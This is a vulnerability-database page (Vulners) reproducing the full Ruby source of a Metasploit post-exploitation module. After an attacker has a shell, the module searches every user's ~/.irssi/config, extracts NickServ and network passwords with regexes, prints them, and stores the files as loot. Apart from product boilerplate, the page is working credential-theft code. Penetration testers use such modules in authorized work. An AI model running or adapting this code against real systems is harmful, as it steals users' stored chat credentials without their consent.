Lucene search
K

Multi Gather IRSSI IRC Password(s)

🗓️ 05 Apr 2017 04:56:24Reported by Jonathan Claudius <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 28 Views

Multi Gather IRSSI IRC Password(s) module grabs IRSSI IRC credentials

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Gather IRSSI IRC Password(s)',
        'Description' => %q{
          This module grabs IRSSI IRC credentials.
        },
        'Author' => [
          'Jonathan Claudius <jclaudius[at]mozilla.com>',
        ],
        'Platform' => %w[bsd linux osx unix],
        'SessionTypes' => %w[shell],
        'License' => MSF_LICENSE
      )
    )
  end

  def run
    print_status('Finding ~/.irssi/config')
    paths = enum_user_directories.map { |d| d + '/.irssi/config' }
    paths = paths.select { |f| file?(f) }

    if paths.empty?
      print_error('No users found with a ~/.irssi/config file')
      return
    end

    download_passwords(paths)
  end

  # Example of what we're looking for in the config...
  #
  # ***Identify Password Example***
  # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
  #
  # ***Network Password Example***
  #    password = "example_password";
  #
  def contains_passwords?(path)
    data = read_file(path)
    identify_passwords = data.scan(%r{/\^?msg nickserv identify ([^\s]+)})
    network_passwords = data.scan(/^?password = "([^\s]+)"/)

    passwords = identify_passwords.flatten + network_passwords.flatten

    if passwords.any?
      print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")
      return true
    end

    false
  end

  def download_passwords(paths)
    print_status "Looting #{paths.count} files"

    paths.each do |path|
      path.chomp!
      next if ['.', '..'].include?(path)

      next unless contains_passwords?(path)

      loot_path = store_loot(
        'irssi config file',
        'text/plain',
        session,
        read_file(path),
        path,
        'IRC Password'
      )
      print_good("irssi config with passwords stored in #{loot_path}")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 13:47Current
0.3Low risk
Vulners AI Score0.3
28